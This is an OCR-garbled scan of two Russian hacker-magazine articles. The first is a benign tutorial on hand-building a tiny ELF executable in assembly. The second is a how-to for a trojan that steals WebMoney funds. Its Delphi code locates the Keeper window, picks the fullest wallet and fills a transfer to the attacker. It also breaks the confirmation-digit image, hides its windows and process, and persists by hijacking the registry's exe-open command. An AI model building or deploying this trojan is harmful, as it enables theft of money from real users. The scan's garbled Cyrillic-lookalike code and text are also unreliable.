Сборка для всех систем осуществляется следующим образом: 

$ аз -о еК_80б.о еК_80б.З 
$ ІсІ -з -о еІТ_80И еІІ_80Гі.о 

Под Ыпих’ом размер файла составляет всего 388 байт, под 
РгееВЗО слегка отстает — 452 байта (сказываются разные вер- 
сии трансляторов и линкеров). Под І_іпих файл запускается сразу 
же и без вопросов, а вот под РгееВЗО требует предварительной 
эмуляции: 

$ ЬгапсІеИ 1 -I І_іпих еІТ_80б 

$ ./еІТ_80Рі 

беІІо.еІТ 

Кстати, под Ыпих’ом существует альтернативный вариант авто- 
матической сборки при помощи все того же дсс, запущенного с 
ключом «-позІагШез» , но в этом случае размер полученного файла 
(даже после стрипа) будет составлять 928 байт, а это плохо (тем не 
менее, все равно меньше, чем с использованием ІіЬс). 

Отладка ассемблерной программы на уровне исходных текстов 




Конструирование еІГа 

Программирование без ІіЬс значительно сокращает размер про- 
грамм, однако полученные файлы все равно остаются большими 
и толстыми. Самый крошечный эльф, который нам только удалось 
получить, весит целых 388 байт, и это притом, что он не насчитыва- 
ет и десятка ассемблерных команд. Что же в нем такое содержит- 
ся? Возьмем любой біех-редактор и посмотрим. 

Нашему взору представится одна вода, то есть нули, «заботли- 
во» вставленные тупым линкером. А что если отказаться от услуг 
линкера и попробовать соорудить еІІ-файл голыми руками? Для 
этого нам, во-первых, потребуется подробное описание всех слу- 
жебных структур еІТ’а (последний ЬгаЙ лежит здесь: ѵѵѵѵѵѵ.саібега. 
сот/сІеѵеІорегз/ааЬіЛ . а во-вторых, транслятор, умеющий генери- 
ровать двоичные файлы, например ЫАЗМ, входящий в большинс- 
тво І_іпих-дистрибутивов, но, к сожалению, не в ВЗО. Во всяком 
случае, его всегда можно скачать с «родной» страницы проекта: 
пазт.зі.пеі . 

Исполняемый еІІ-файл нуждается в двух структурах: еІТ-НіеасІег’е, 
описывающим основные параметры файла (платформа, адрес 
точки входа и т.д.) и ргодгат біеабег іаЫе, перечисляющего все 
сегменты. Как минимум, должен быть один сегмент с правами на 
чтение, запись и исполнение. Наконец, чтобы еІТ заработал, требу- 
ется добавить «боевую начинку» , то есть непосредственно сам ас- 
семблерный код. Минимальный адрес, с которого в ІІІЧІХ-системах 
может загружаться еіі, равен 8048000И, поэтому нам понадобится 
директива ОБО, задающая начальное смещение в файле. 
Остается только изучить документацию и заполнить все служеб- 
ные структуры соответствующим образом: 

Ассемблерный файл еіі" Ііпѵ.азт, сконструированный голыми руками 
ВІТЗ 32 
огд 80480006 

_зІаП: 
тоѵеах,4 
хогеЬх.еЬх 
іпсеЬх 
ризб еЬх 
тоѵесх.тзд 
тоѵ ебх,тзд_епсІ-тзд 
іпі 806 
рореах 
іпі 806 

тздсІЬ «беІІо.еІКОАб 
тзд_епсІ: 

ЯІезіхе еци $-$$ 

Теперь, когда борьба идет за каждый байт, воспользуемся ас- 
семблерными трюками, оптимизирующими размер ассемблер- 
ного кода. Во-первых, заменим «МОѴ ЕВХ, 1 » на «ХОР ЕВХ,ЕВХ», 
«ІІ\ІС ЕВХ» (напоминаю, ІЧАЗМ использует синтаксис Іпіеі’а), во- 
вторых, сохраним это значение в стеке однобайтовой командой 
«РЕІЗН ЕВХ» — позднее оно нам понадобится для системного 
вызова ехіі. В-третьих, не будем явно инициализировать код воз- 
врата — он ведь нам все равно не нужен. 

$ пазт 4 Ьіп -о еІМіпу еІМіпу.азт 
$сбтосІ +х еІМіпу 

После сборки образуется двоичный еІІ-файл размеров всего в 1 1 8 
байт, что в три с лишним раза короче аналогично файла, собран- 
ного стандартным линкером. Но это еще не предел! 

Экстремальная оптимизация 

Держись! Мы вошли в раж и не оторвемся от клавиатуры, пока не со- 
кратим файл хотя бы на десяток байт. Больше всего нас раздражают 
е_ібепі-байты, оставленные для выравнивания в количестве целых 



; //системный вызов #4 «ѵѵгііе» 

; // 1 - ЗТООІЯ 

; // смещение выводимой строки 
; //длина строки 
; // ѵѵгі1:е(1 , тзд, Іеп); 

; //системный вызов #1 «ехИ» 

;// код возврата 
; // ехіі(0); 



; //системный вызов #4 «ѵѵгііе» 

; // 1 - ЗТООІЯ 

; // смещение выводимой строки 
; //длина строки 
; // \л/гі!:е(з1:сІои1:, тзд, Іеп); 

; //системный вызов #1 «ехИ» 
;//ехіИ(?); 
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Внутри еІТ-файла — лишь пустота 



3 

На прилагаемом к журналу ком- 
пакт-диске. помимо исходных 
кодов ѳІГ.ІЗ.азтІ. ты сможешь 
найтиполнѵюверсиюэтойстатьи. 



девяти штук, плюс один байт версии еІТ-файла, которую все равно 
никто не проверяет! А что если поместить строку «НіеІІо.еІТ» именно 
здесь?! Сказано — сделано! Ведь еІІ-заголовок отображается на 
память и вполне пригоден для хранения переменных. Но это еще не 
все! Даже поверхностный взгляд показывает, что 8 последних байт 
еІІ-заголовкасовпадаетс8-ми первыми байтами ргодгатИеабегІаЫе, 
следующего непосредственно за ним. Вот они, красавчики: «01 й ООй 
ООй ООй ООй ООй ООй ООй 01 й 00й 00й 00й 00й 00й 00й 00й». А почему 
бы не сдвинуть начало ргодгат йеабег іаЫе так, чтобы оба заголовка 
перекрывались? Для этого достаточно будет скорректировать поле 
е_рйоф переместив метку рйсіг вглубь еІІ-заголовка. 

Оптимизировав служебные структуры насколько это возможно, 
займемся «несущим» кодом. Команда «МОѴ ЕАХ,4» съедает целых 
5 байт, но, если немного подумать, можно отвоевать 1 байт, заменив 
ее эквивалентной конструкцией: «ХОР ЕАХ,ЕАХ», «МОѴ Ай, 4». То же 
самое относится и к «МОѴ Е0Х,М30_ЕІ\Ю-М5(3. 

Проделав все эти операции, мы получим следующий файл: 

Оптимизированный файл еЦ ііпіх.азт с перекрывающимися заголовками 
ейісіг: 

; сІЬ 7Рй, «ЕІ_Р», 1,1,1 ; // е_ісІепі 

сІЬ 7РГі, «ЕЙР», 1 , 1 ;//е_ісІепі 

; // размещаем выводимую строку в поле е_ісІеп1: 

; // в ЕІ_РАО байтах, оставленных для выравнивания, 

; // «захватывая» и байт ЕІ_ѴЕРі5ІОІ\І 
тздсІЬ «беІІо.еНЧОАб 
тзд_епсІ: 



рйсіг: 

; // используем наложение ргодгат йеасіег іаЫе на еі! йеасіег, 
; // заголовки как бы проникают друг в друга, и это работает, 

; // потому что конец е\і йеабег’а совпадает с ргд йеабег’ом 



сісіі 
; сіѵѵО 
сісіО 
; сіѵѵО 

ейбгзіге еди$-е6с1г 



// е_рйпит 
// е_зйеп 1 :зі 2 е 
// е_зйпит 
// е_зйзігпбх 



_зІагі: 

хогеах.еах 

тоѵеЬх.еах 

тоѵебх.еах 

тоѵаІ,4 

іпсеЬх 

ризйеЬх 

тоѵесх.тзд 

тоѵ сІІ,тзд_епсІ-тзд 

ІПІ80Й 

рор еах 

ІПІ80ЙІ 

Шезіге еди$-$$ 



; получаем ноль 
; копируем ноль в еЬх 
; копируем ноль в есіх 
; //системный вызов #4 «ѵѵгііе» 

;// 1 -ЗТООІЛ 

; сохраняем еЬх == 1 для зузсаІГа #1 ехіі 
; // смещение выводимой строки 
; //длина строки 
://\л/гііе(1, тзд, Іеп); 

; //системный вызов #1 «ехіі» 

;//ехіі(0); 



Транслируем его тем же путем, что и раньше, и получаем 98 байт! 
Самое интересное, что под Ыпих’ом этот файл еще и работает, а вот 
РгееВЗО, увы, шуток с перекрытием заголовков не понимает. 

Но 98 байт это еще не предел! Переписав «несущий» код, легендар- 
ный хакер Юрий Харон сходу сократил его еще на 2 байта, сказав при 
этом: «...а вот дальше уже думать надо, но лень». Харон использовал 
прямую засылку константы в стек командой « РІІЗН 1 » , занимающий 
всего два байта — «6Ай 01 И», которую коварный ІЧАЗМ растянул до 
целых 5-ти байт «68й 01 И 00И 00И 00И», поэтому пришлось прибег- 
нуть к прямой машиннокодовой вставке директивой бѵѵ. Также Харон 
использовал могучую инструкцию І_ЕА, о существовании которой 
нельзя забывать. 

Заключение 

Мы прошли длинный путь и добились впечатляющих результатов. 
96 байт для программы «НіеІІо.еІТ» — это успех, которым можно гор- 



диться. Если убрать перекрытие заголовков, мы получим 1 00 байт, 
но тогда файл будет работать как под І_іпих, так и под РгееВЗО. Но 
цепная реакция оптимизации на этом еще не заканчивается. Кто из 
читателей приметвызов и сократитфайл хотя бы еще наодин байт?зс 



Стадия оптимизации 


Размер, байт 




Ыпих 


взо 


еІМіЬс.З, автоматически собранный дсс 


12096 


4270 


еІПіЬс.З, автоматически собранный дсс после стрипа 


2920 


2744 


еЯМіЬс.З, собранный вручную аз-ісі 


2892 


2108 


еЯМіЬс.З, собранный с отладочной информацией 


12268 


3145 


еК_80Іі.З, собранный вручную/автоматически 


388/928 


452\ 


еІМіпу.азт, сконструированный голыми руками 


118 


118 


еІМіпух.азт, оптимизированный мыщъх’ем 


98 


. 


еІМіпуб.азт, оптимизированный Юрием Хароном 


96 


- 



Г рафик похудания еійфайла 




От редактора 

Воодушевленный успехами мыщъха, я решил пос- 
у мотреть, каким будет объем исполняемых файлов 
в ОрепВЗО. «Влет» ручная сборка асмовых исход- 
ников не прошла. После детального разбора «тап 
5 еІІ» выяснилось, что сырец нужно помечать специ- 
альным образом с помощью секции «.поіе.орепЬзсІ.ісІепК Это 
своеобразная подсказка для ядра, позволяющая при загрузке 
двоичных файлов избежать дополнительных проверок и отклю- 
чить эмуляцию бинарной совместимости. Воттак должна выгля- 
деть «нэйтивная» секция файла орепеІІ.З: 



Андрей 

Матвеев 



.зесііоп «.поіе.орепЬзсІ.ісІепК» 

,р2аІідп2 

.Іопд 0x8 

.Іопд 0x4 

.Іопд 0x1 

.азсіі «ОрепВЗйХО» 

.Іопд 0х 
,р2аІідп2 



Чтоинтересно,безстрочки<.зесііоп«.по^е.орепЬ5б.ібепі»,«а»> 
сборка проходит, но при запуске вылетает ошибка со следую- 
щимсообщением: 



% ./орепеі! 

236: орегаііоп поі регтійеб: ./орепеК 

Да, не фонтан. Немного поразмыслив, в любом шестнадцате- 
ричном редакторе, например в«Иехес№ ./орепеІІ», производим 
изящный финт хвостом, модифицируя содержимое первой 
строчки орепеІІ с: 

00000000 7Р 45 4С 46 01 01 01 00 00000000 00000000 ,ЕІ_Р 



На: 

00000000 7Р4Р4С 46 01 01 01 01 01 000000 00000000 ,ОІ_Р 

После сохранения изменений снова запускаем подопытный 
бинарик: 

% ѴорепеК 
беііо, е№ 

Магия эльфов :). 
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9 

Про хуки гляди здесь: 
ѵ\лллл/. гзсіп . ги/агіісІе/Ьазезегѵ/ 
ѵѵіпііоокз.хті 



Предыстория 

О способах похищения денег с кошель- 
ков ѴѴеЬМопеу ходят легенды: специальные 
сборщики, накрутчики ѴѴМ-денег, взлом про- 
граммы-клиента, перехваты трафика с сер- 
веров и другие фантастические истории. Все 
эти способы — выдумка. Взломать напря- 
мую ѴѴМ Кеерег не очень сложно, но это бес- 
полезная трата времени: все операции осу- 
ществляются только на сервере, и никакой 
перехват трафика здесь не поможет. Кеерег 
является всего лишь передатчиком действий 
пользователя и средством просмотра состо- 
яния счета. Ты задаешь команду — сер- 
вер ее выполняет. Если выполнить команду 
невозможно (например, недостаточно денег 
на счете для перевода) — появится сообще- 
ние об ошибке. 

Пожалуй, только хищение самих ключей 
от ѴѴМ Кеерег’а долгое время оставалось 
единственной реальной возможностью полу- 
чить доступ к чужим кошелькам. Но появле- 
ние таких дополнительных мер защиты, как 
увеличение размера ключей до 100 Мб и 
активизация через е-таіі при использовании 
с другого компьютера, сделало и этот спо- 
соб абсолютно бесполезным. (Я бы не так 
сказал. Например, у меня активация отклю- 
чена, так как часто работаю с виртуальными 
и зашифрованными дисками, подключение 
которых Кеерег воспринимает как измене- 
ние аппаратной конфигурации и требует 
ввода кода. Задание размера ключей в вер- 
сии 3.0.0.0 я не нашел. А вот хранение ключей 
на епит.ги решает проблему хищения, но 
этим сервисом пользуются не все. — Прим, 
редактора). 

Хочешь такой счет? 

Мой метод довольно прост. Все началось с 
того, что я случайно забрел на давно забы- 
тую ссылку — Ьіір://ѵѵѵѵѵѵ.хакер.ги//тада 2 іпе/ 
ха/067/042/1 .азр. Автор изобрел оригиналь- 
ный метод, основанный на стандартных 
ѴѴіпАРІ-функциях. Однако и эта статья уста- 
рела и пришла в негодность. Я кардиналь- 
но переработал его метод и вложил часть 
своего замысла. 




Переводы 

Ведіп 

В начале наша программа будет просто 
висеть в памяти и проверять все окна на 
наличие заголовка «ѴѴеЬМопеу Кеерег». Это 



легко делается с помощью АРІ-функции: 

РіпсІѴѴіпсІоѵѵ: 
ѵа КеерегѴѴпсЖѴѴШ; 
ѵѵіпііе КеерегѴѴпсІ=0 Іо 

КеерегѴѴпсІ:=РіпсІѴѴіпсІо\л/( ,РСЬаг( 
‘ѴѴеЬМопеу Кеерег’)); 



Впоследствии мы будем получать хэндлы 
дочерних окон (нужные поля ввода, кнопки и 
другие необходимые объекты). Для их полу- 
чения используется функция ОеіѴѴіпсІоѵѵ, пер- 
вым параметром которой выступает хэндл 
основного окна, а вторым — ОѴѴ_СНіиэ. 
Итак, программа запущена. Теперь проверя- 
ем ее коннект к серваку. Эту проверку я реа- 
лизовал следующим образом. АРІ-функцией 
ОеіѴѴіпсІоѵѵ получаем хэндлы дочерних окон: 
полей ввода, кнопок и др. Шестым будет 
хэндл кнопки, на которой написан статус про- 
граммы (онлайн или оффлайн). При помощи 
функции ОеіѴѴіпсІоѵѵТехі мы считываем с нее 
текст. Однако нам недостаточно знать ста- 
тус, ведь программа проходит этап авториза- 
ции. Нам необходимо ждать появления такой 
строки текста: «ОпЫпе [ѴѴМЮ] — обновить 
данные». (В версии 3.0.0.1 можно, напри- 
мер, ждать исчезновения многоточия из этой 
строки. — Прим, редактора). 



Г 









ОПРЕДЕЛЯЕМ 
СТАТУС КЕЕРЕЯ'А 



ЫіГ:аггау[1..100] оГ с Наг; 
ВиПоп\ѴпсІ:аггау[1..20] оГН\УЫО; 
і:іпіе§ег; 

2егоМетогу(@ЪиГ,8І2еоГ(Ьиі)); 
ВиИоп\Упс1[ 1 ]:=Оеі:\Уіпс1о\у(Кеерег\Уп<і, 
<л\У СНІІЛ)); 

Гог і:=2 Іо 6 сіо Вийоп\Уп<і[і]:=Оеі\Уіпёо\ѵ( 
Виііоп^псіСі-ІІ^^ЬВѴКВКЕХТ); 

гереаі 

Се1\ѴіпсІо\ѵТех1;(Вийоп\Ѵпсі[6], 

@ЪиГ, §І 2 еОГ(Ьиі)); 
ипШ ро8('Обновить данные', ЪиГ)<>0; 



Автор статьи от 2003-го года предлагает 
лазить по меню настройек программы ѴѴМ и 
изменять параметры безопасности. Это лиш- 
нее. Во-первых, установленные настройки 
на работу вируса влиять абсолютно не будут. 
Во-вторых, главные настройки безопаснос- 
ти все равно не удастся изменить: разра- 
ботчики учли этот недостаток и влепили 
подтверждение установленных изменений 
вводом трехзначного числа. И, в-третьих, 
это дополнительная трата времени работы 
вируса и лишнее палево. А мы для начала 
жмем на кнопку «Меню» и добираемся до 
пункта «В кошелек ѴѴеЬМопеу...»: 



Пытаемся открыть окно перевода денег - "Пере- 
дать ѴѴМ" 

ЗепсІМез5аде(КеерегѴѴпсІ І 

ѴѴМ_5Ѵ5СОММАІ\Ю, ЗС_ВЕЗТОВЕ,0); 
ВгіпдѴѴіпсІоѵѵТ оТ ор(КеерегѴѴпсІ) ; 
ЗепсІМез5аде(ВиііопѴѴпсІ[5], 



ѴѴМ_ІМЕ_КЕѴООѴѴМ,ѴК_ЗРАСЕ,0); 

ЗепсІМе55аде(ВиПопѴѴпсІ[5] І 

ѴѴМ_ІМЕ_КЕѴІІР,ѴК_5РАСЕ,0); 

Тог і:=1 іо 8 сіо Ьедіп 

5епсІМеззаде(ВиііопѴѴпсІ[5], 

ѴѴМ_І М Е_КЕУ ООѴѴІМ , ѴКЛОѴѴЫ , 0) ; 
ЗепсІМеззаде(ВиііопѴѴпсІ[5], 

ѴѴМ_ІМЕ_КЕУІІР,ѴК_ООѴѴМ,0); 

епф 

5епбМез5аде(ВиііопѴѴпсІ[5], 

ѴѴМ_ІМЕ_КЕѴРОѴѴМ,ѴК_ВІѲНТ,0); 

ЗепсІМеззаде(ВиііопѴѴпсІ[5] І 

ѴѴМ_ІМЕ_КЕУІІР,ѴК_ВІѲНТ,0); 

ЗепсІМе55аде(ВиііопѴѴпсІ[5] І 

ѴѴМ_ІМЕ_КЕУООѴѴМ,ѴК_ООѴѴМ,0); 

5епбМез5аде(ВиііопѴѴпсІ[5], 

ѴѴМ_ІМЕ_КЕУІІР,ѴК_ООѴѴМ,0); 

ЗепсІМеззаде(ВиііопѴѴпсІ[5] І 

ѴѴМ_ІМЕ_КЕУООѴѴМ,ѴК_РЮНТ,0); 

ЗепсІМе55аде(ВиііопѴѴпсІ[5], 

ѴѴМ_ІМЕ_КЕУІІР,ѴК_ВЮНТ,0); 

5епбМез5аде(ВиііопѴѴпсІ[5], 

ѴѴМ_ІМЕ_КЕУРОѴѴМ,ѴК_ВЕТиВМ,0); 

ВиііопѴѴпсІ[5] — это указатель на кноп- 
ку «Меню». Сначала мы выдвигаем окно 
Кеерег’а на передний фон, затем жмем на 
кнопку и начинаем путешествовать по меню 
до нужного нам пункта. 

Снова получаю хэндл появившегося окна с 
помощью функции РіпсІѴѴіпсІоѵѵ и получаю 
хэндлы нужных мне полей ввода. Я опять, 
не усложняя себе жизнь, прогнал цикл іо г 




Позиция полей ввода, кнопок и других 
объектов 

для получения нужных мне дочерних окон. В 
3.0.0.0 версии ѴѴМ многие кнопки поменяли 
свои места. Здесь я опишу их достоверную 
позицию. 

Находим хэндлы полей ввода, кнопок и других 
необходимых объектов 

ѵаг 

ТгапзіепНѴѴШ; 

ТгапзѴѴпсІ:аггау[1..40] оі НѴѴІ\Ю; 

гереаі 

Тгапзіег:=РіпсІѴѴіпсІоѵѵ( , 

РСНаг(‘Передать ѴѴМ’)); 
ипііі ТгапзіегоО; 

ТгапзѴѴпсІ[1]:=ОеіѴѴіпсІоѵѵ(Тгап5Іег,ОѴѴ_СНІШ); 

Тог і:=2 іо 37 сіо ТгапзѴѴпсі[і]:=(ЗеіѴѴіпсІоѵѵ( 
ТгапзѴѴпсІ[і-1 1.ѲѴѴЛѴѴМОЫЕХТ); 

Соответствие номеров конкретным объек- 
там смотри на рисунке. Далее мне была 
непонятна логика автора предыдущей ста- 
тьи, ведь он сразу перешел к заполнению 
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полей ввода суммы и типа своего кошель- 
ка. Во-первых, откуда он знает, сколько 
денег имеет юзер? $1000, $10, а может 0? 
Во-вторых, деньги, возможно, имеются не 
только в 2-кошельке, ведь еще есть В, II, 
Е. В-третьих, не факт, что юзер использует 
только 4 кошелька. В ѴѴМ, например, можно 
создать кучу дополнительных однотипных 
кошельков для одного ѴѴМЮ. Более того, 
в настройках по умолчанию можно поста- 
вить любой номер кошелька, поэтому не 
факт, что им по умолчанию будет только 2. 
Ввиду всего вышесказанного я буду созда- 
вать массив данных, где будут записаны 
все имеющиеся кошельки. Код смотри во 
врезке. Тут мы сначала переходим к само- 
му первому кошельку, потом получаем его 
номер, тип и сумму на нем и добавляем всю 
информацию в массив. Затем переходим к 
следующему кошельку. После выполнения 
этого куска кода в переменной зіор будет 
записано общее количество кошельков. 
(Кстати, неплохо бы еще раскидать по всему 
коду команды зІеер(ІО), чтобы клиент успел 
обработать сообщения. — Прим, редактора). 
В этом коде есть одна тонкость, о которой 
следует рассказать отдельно. В русской вер- 
сии Винды в качестве разделителя целой и 
дробной части числа используется запятая, 
а в кипере — точка. Из-за этого процеду- 
ры типа ЗігТоРІоаі будут работать непра- 
вильно. Так что мы будем использовать 
ТехГГоРІоаі, как показано, а где-то выше по 
коду нужно завести переменную Ьгтаі типа 
ТРогтаіЗеКіпдз и добавить строчки: 

<ЗеіІ_осаІеРогтаі5еіііпдз( 

І_АІ\ІО_ЗѴ ЗТЕ М_0 Е РАІІ І_Т,іогтаі) ; 
іогтаШесітаІ5ерагаіог:=’.’; 

Теперь мы будем искать кошелек, на кото- 
ром больше всего денег. 




ИЩЕМ САМЫЙ 
ТОЛСТЫЙ КОШЕЛЕК 

ѵаг 

Іпс1:іпіедег; 

коеі,тах:геаі; 

іпсЫО; тах:=0.0; 

Тог і:=1 іо зіор сіо Ьедіп 
сазе КозГі[і].В21ІЕ оі 
'РГ: коеЫІ.О; 

2': коеі:=27.2; 

'Е': коеі:=34.2; 

'ІГ: коеі:=5.3; 
еізе коеі:=0.0; 
епсі; 

іі тах<КозГі[і].Зит*коеі іГіеп 
Ьедіп 

тах:=КозГі[і].Зит*коеі; 

іпсЫІ; 

епсі; 

епсі; 



Тут мы приводим всю валюту к ѴѴМВ путем 
умножения на их курсы и ищем максимальное 
значение. Если после выполнения кода в іпсі 
записано 0, то у юзера не будет денег ни в 
одном кошельке. 



Ну вот, теперь заполняем все поля окна пере- 
вода. 

Заполняем поля в окне «Передать ѴѴМ» 
іс і:=1 іо (зіор-іпсі) іо Ьедіп 
РозіМеззаде(Т гапзѴѴпф ], 

ѴѴМ_КЕ УОО\Ш , ѴК_ІІ Р , 0) ; 

РозіМеззаде(Т гапзѴѴпф ], 
ѴѴМ_КЕУІІР,ѴК_иР,0); 

епсі; 

5епсІМеззаде(Т гапзѴѴпфЗ], ѴѴМ_5ЕТТЕХТ, 0, 
І_опдІпі(РСЬаг(‘[Твой ѴѴМ кошелек]’))); 
5епЦМеззаде(ТгапзѴѴпсІ[2],ѴѴМ_ЗЕТТЕХТ,0,І_опдІ 
пі(РСЬаг(РІоаіТоЗіг(0.992*КозЬ[іпсІ].Зиіті)))); 
8епсІМе55аде(Тгап5ѴѴпсІ[4], ѴѴМ_5ЕТТЕХТ, 0, 
І_опдІпі(РСЬаг(‘В Мировой фонд хакеров!’))); 
РозіМеззаде(Т гапзѴѴпсІ[8], 

ѴѴМЛЕѴООѴѴЫ,ѴКЛЕТІІВІ\І,0); 

РозіМеззаде(Т гапзѴѴпсІ[8], 
ѴѴМ_КЕѴІІР,ѴК_ВЕТІІВМ,0); 

Ну что же, перейдем к более сложной части 
нашего повествования 

Распознавание 

Если ты уже когда-нибудь пользовался про- 
граммой ѴѴМ, то должен был еще в самом 
начале задаться вопросом: как же обойти 
подтверждение перевода, ведь там необ- 
ходимо вводить трехзначное число из кар- 
тинки!? Мой ответ — никак! Моих знаний 
ассемблера недостаточно, чтобы проигно- 
рировать эту процедуру. Поэтому придется 
тупо распознавать эти три меняющиеся в 
размере цифры. Вообще-то, это отдельная 
статья, и если кто-нибудь меня хорошо 
попросит, я могу ее написать, так как в 
инете про это, увы, ничего не сказано. 
(Именно про алгоритм можно почитать 
тут: ЬПр://хакер.ги/тада2Іпе/ха/073/1 20/1 . 
азр. — Прим, редактора). 

Сначала разберемся, что за цифры мы 
имеем: эта цветная картин- 

ка без рамки имеет размер 
46x18 пикселей. Всего три 
цифры. Первая цифра может 
принимать два положения 
— среднее и большое, вто- 
рая — среднее и маленькое, тре- 
тья — среднее, большое, маленькое и 
наклонное. Но они всегда располагаются 
в одном и том же месте. Правда, размер 
окна и положение самой картинки не 
всегда одинаков (однако всегда неизмен- 
ным остается ее положение по отноше- 
нию к нижнему левому краю). 

Сначала проверим наличие этого окна: 

гереаі 

Т гапзіег:=РіпсІѴѴіпсІоѵѵ(піІ, 

РСЬаг(‘Передача ѴѴМ клиенту ѴѴеЬМопеу’)); 
ипііі ТгапзіегоО; 

ВгіпдѴѴіпсІоѵѵТоТор(Тгап5Іег); 

Копируем картинку. Нам потребуется 
компонент Ітаде. 

Копируем картинку 
ітадеі ,ѴѴісІІЬ:=46; 
ітаде1.НеідЬі:=18; 

ѲеіѴѴіпсІоѵѵВесі(Тгапзіег,Весі); 

ОС:=ОеЮС(Т гапзіег); 

ВііВІі(Ітаде1.Сапѵаз.НапсІІе, 0, 0, 46, 18, йС, 123, 
Весі.Воііот-Весі.Тор-55-18-32,ЗВССОРѴ); 
ВеІеазеОС(Т гапзіегДС); 



32 — размер заголовка окна, его тоже надо 
учитывать. Теперь картинка с цифрами ско- 
пирована. Мы разобьем ее на три части 
(ітді, ітд2, ітдЗ) и начнем по пикселям 
сравнивать матрицу с уже имеющимися 
моделями (матрицами) цифр. Удобнее, если 
картинка будет монохромной. 

Делается это так: 

Ітадеі .Рісіиге.Віітар.РіхеІРогтаі:=рі1 Ьіі; 

Ітадеі. Рісіиге.Віітар.МопосЬготе:=ігие; 

Так как ширина картинки 46 пикселей, то 
разбитие лучше всего сделать таким: 15x18, 
16x18 и 15x18 пикселей. 

Массив цветов 1 -ой цифры 

ѵаг 

іт§ 1 : ітау[0. . 14, 1 .. 1 7]оГ Ъуіе; 
х,у:іпіе§ег; 

Гог х:=0 іо 14 сіо 
Гог у:=0 іо 17 (іо 

і іта§е1.Сапѵа8.РіхеІ8 [х,у] 

= сГѴѴЪііе іііеп іт§1[х,у]:=0 
еізе іт§1[х,у]:=1; 



Для 2-ой и 3-ей цифры делаем аналогично. 
Теперь наши цифры содержатся в массивах 
из нулей и единиц. Нам потребуются моде- 
ли цифр. Всего их будет 40. Понадобится 
немного терпения, так что сохрани полу- 
ченную матрицу в текстовый вид, а затем 
в вирусе создай модели по этим цифрам. 
Можно чуть ускорить процесс сравнения 
цифр, если знать ее положение (маленькое, 
большое и др.). Сам код проверки можно 
увидеть на диске. 

Осталось последнее окно. В него мы отсы- 
лаем наши распознанные цифры и жмем 
кнопку «Да». Затем ждем появления окна 
результата перевода и закрываем его. 

Заполнения окна «Передача ѴѴМ клиенту 

ѴѴеЬМопеу» 

ѵаг ОТзігіпд; 

Т гапзѴѴпф ]:=ОеіѴѴіпсІоѵѵ(Т гапзіег,(ЗѴѴ_СНІІ_0); 
і:=2 іо 3 сі ТгапзѴѴпсІ[і]:=ОеіѴѴіпсІо\л/( 
ТгапзѴѴпсІ[і-1 ],ѲѴѴ_НѴѴШМЕХТ); 
ЗепсІМеззаде(Т гапзѴѴпф ],ѴѴМ_5ЕТТЕХТ,0, 
ЕопдІпі(РСИаг(ІпіТоЗіг(31) + ІпіТо5іг(52) + 
ІпіТоЗіг(ЗЗ)))); 

ЗепсІМе55аде(Т гапзѴѴпф], 

ѴѴМ_І М Е_КЕѴ ООѴѴЫ , ѴК_ВЕТІІ В N , 0) ; 
5епсІМеззаде(Т гапзѴѴпф], 

ѴѴМ_ІМЕ_КЕУиР,ѴК_ВЕТиВЫ,0); 
ОаіеТіплеТоЗігіпдрт, ’уууу.тт.сісі Ыгпп’, Ыоѵѵ); 
гереаі 

Т гапзіег:=РіпсІѴѴіпсІоѵѵ(піІ, 

РСЬаг(‘Передача ѴѴМ ‘+ОТ)); 
ііп ТгапзіегоО; 

ЗепсІМеззаде(Тгапзіег, ѴѴМ_СІ_ОЗЕ, о, 0); 

Нісісіеп & сіапдегоиз 

Чтобы юзер не заподозрил потусторон- 
нее программное обеспечение, а главное 
— открывающиеся окна, нашу программу 
необходимо скрыть, а весь выше описанный 
процесс сделать визуально невидимым. Я 
предлагаю при появлении необходимого нам 
окна сразу же делать его прозрачным: 

5еіѴѴіпсІо\/ѵІ_опд(<хэндл нужного окна>, 

ОѴѴІ__ЕХ5ТѴ|_Е,ѴѴ5_ЕХ_|_АѴЕВЕО); 

ЗеіЦауегесІѴѴіпсІоѵѵАіігіЬиіез( 

<хэндп нужного окна>, 0, 0, $00000002); 

Еще можно использовать ѴѴіпАРІ-функ- 
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Хочешь такой счет? 

ции и просто оттащить появившееся окно 
за пределы экрана: 

ЗеіѴѴіпсІоѵѵРо5((<хэндл нужного окна>,0,2000, 
2000, 0, 0, ЗѴѴР_ІЧОЗІ2Е); 

Тут 2000 — это координаты X и У экра- 
на. Недостаток этого метода лишь в том, 
что, несмотря на использование оператора 
гереаі, окно все равно успеет прорисоваться, 
а значит, будет замечен эффект «передер- 
гивания» окна. Идеальным вариантом будет 
использование Ііоок’а на создание окна (про 
хуки полно документации в инете). 

Хук окон до их прорисовки на экране монитора: 
Рипсііоп ѴѴпсІНоокРгос(пСосІе:Іпіедег;ѵѵРагапп: 
иіМТ;ІРагат:ШМТ):І_Р{Е5иі_Т; зісісаіі; 

Ьедіп 

КеерегѴѴпсІ:=РіпсІѴѴіпсІоѵѵ( піі, 

РСНаг(‘ѴѴеЫѴІопеу Кеерег’)); 



// Делаем над окнами все, что нам нужно 
епсі; 

ВезиІ1:=СаІІМех1НоокЕх(НоокНапсІІе, пСосІе, 
ѵѵРагат, ІРагат); 

епсі; 

Теперь о том, как скрыть наш троян от СігІ- 
АИ-ЭеІ. Делается это очень просто — пос- 
редством хука. Исходник этого хука, вклю- 
чая отлов окон, ты можешь найти на диске. 
Важно отметить, что сІІІ будет вызываться 
динамически: если нашу библиотеку запа- 
лят, то программа все равно будет продол- 
жать работать и сможет вытащить из себя 
другую сІІІ. Разумеется, предварительно ее 
нужно вставить в ехе-файл. Это увели- 
чит размеры программы, но зато он будет 
непреступен. Код вызова такой библиотеки 
смотри во врезке. 

Теперь пару слов об автозагрузке вируса. 
Большая часть всех троянов использует 
обычную автозагрузку в реестре: НКЕѴ_ 
ЮСА^МАСНІМЕ/ЗОРТѴѴАВЕ/МісгозоП/ 
ѴѴіпбоѵѵз/СиггепІѴегзіоп/Вип, но это палев- 
но. Намного лучше будет юзать эту ветвь 
реестра: НКЕУ_СІАЗЗЕЗ_ВООТ/ехеІіІе/ 

зііеіі/ореп/соттапсі, изменив значение 
«%1» %* на ‘имя_вируса.ехе «%1» %*’. 
Теперь, при открытии любого ехе-файл, 
будет запускаться наш троян. Чтобы ехе- 
файлы могли загружаться, в вирус нужно 
обязательно вставить такую строку: 

ѴѴіпЕхес(РАЫЗІСІіаг(Рагат5{г(1)),ЗѴѴ_Ве5Ьге); 



пСосІе>=0 Неп 










дл» У пр 







Место расположения 3-х цифр 



Итого 

В своей статье я подробно описал весь 
процесс перевода, но главное — сам метод! 
